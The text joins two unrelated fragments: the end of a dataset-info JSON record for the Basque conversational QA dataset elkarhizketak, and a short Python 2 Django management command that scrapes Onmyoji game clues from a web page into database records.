\"979-10-95546-34-4\",\n}\n", "homepage": "http://ixa.si.ehu.es/node/12934", "license": "Creative Commons Attribution-ShareAlike 4.0 International Public License (CC BY-SA 4.0)", "features": {"dialogue_id": {"dtype": "string", "id": null, "_type": "Value"}, "wikipedia_page_title": {"dtype": "string", "id": null, "_type": "Value"}, "background": {"dtype": "string", "id": null, "_type": "Value"}, "section_title": {"dtype": "string", "id": null, "_type": "Value"}, "context": {"dtype": "string", "id": null, "_type": "Value"}, "turn_ids": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "questions": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "yesnos": {"feature": {"num_classes": 3, "names": ["y", "n", "x"], "id": null, "_type": "ClassLabel"}, "length": -1, "id": null, "_type": "Sequence"}, "answers": {"feature": {"texts": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "answer_starts": {"feature": {"dtype": "int32", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "input_texts": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}}, "length": -1, "id": null, "_type": "Sequence"}, "orig_answers": {"texts": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "answer_starts": {"feature": {"dtype": "int32", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}}}, "post_processed": null, "supervised_keys": null, "task_templates": null, "builder_name": "elkarhizketak", "config_name": "plain_text", "version": {"version_str": "1.0.0", "description": null, "major": 1, "minor": 0, "patch": 0}, "splits": {"train": {"name": "train", "num_bytes": 1024378, "num_examples": 301, "dataset_name": "elkarhizketak"}, "validation": {"name": "validation", "num_bytes": 125667, "num_examples": 38, "dataset_name": "elkarhizketak"}, "test": {"name": "test", "num_bytes": 127640, "num_examples": 38, "dataset_name": "elkarhizketak"}}, "download_checksums": {"http://ixa2.si.ehu.es/convai/elkarhizketak-v1.0/elkarhizketak-train-v1.0.json": {"num_bytes": 1543845, "checksum": "36674936820c9a5d8a5de144776dd57e2e4f5f63eec6ac45f93e47e5fd9daecd"}, "http://ixa2.si.ehu.es/convai/elkarhizketak-v1.0/elkarhizketak-dev-v1.0.json": {"num_bytes": 189736, "checksum": "fbf2e14b63de9a8406a9b44dccd0e2c4dcdf07724af737ccd05e06311a632f57"}, "http://ixa2.si.ehu.es/convai/elkarhizketak-v1.0/elkarhizketak-test-v1.0.json": {"num_bytes": 193893, "checksum": "311154feb69ede265ed695f97ab81811d78d837572114396b6e8779fdeb3e3f0"}}, "download_size": 1927474, "post_processing_size": null, "dataset_size": 1277685, "size_in_bytes": 3205159}}
1,515
395
<filename>api/management/commands/get_clues.py # coding: utf-8 from __future__ import unicode_literals from bs4 import BeautifulSoup import requests from django.core.management.base import BaseCommand from core.models import Hellspawn class Command(BaseCommand): def handle(self, *args, **options): url = 'http://www.18183.com/yys/201609/706902.html' result = requests.get(url).content soup = BeautifulSoup(result) clues = soup.findAll('tr', {'class': 'li_on'}) for itm in clues: clue = itm.find('td', {'class': "jiacu"}).text.strip() hellspawn = itm.findAll('td')[1].find('span').text.strip() print clue, hellspawn hs = Hellspawn.objects.get(name=hellspawn) hs.clue1 = clue hs.save() clues = soup.findAll('tr', {'class': 'li'}) for itm in clues: clue = itm.find('td', {'class': "jiacu"}).text.strip() hellspawn = itm.findAll('td')[1].find('span').text.strip() print clue, hellspawn if clue == 'xxxx': break else: hs = Hellspawn.objects.filter(name=hellspawn) if hs.exists(): hs = hs[0] hs.clue1 = clue hs.save() else: print 'no exist: {0}'.format(hellspawn)
712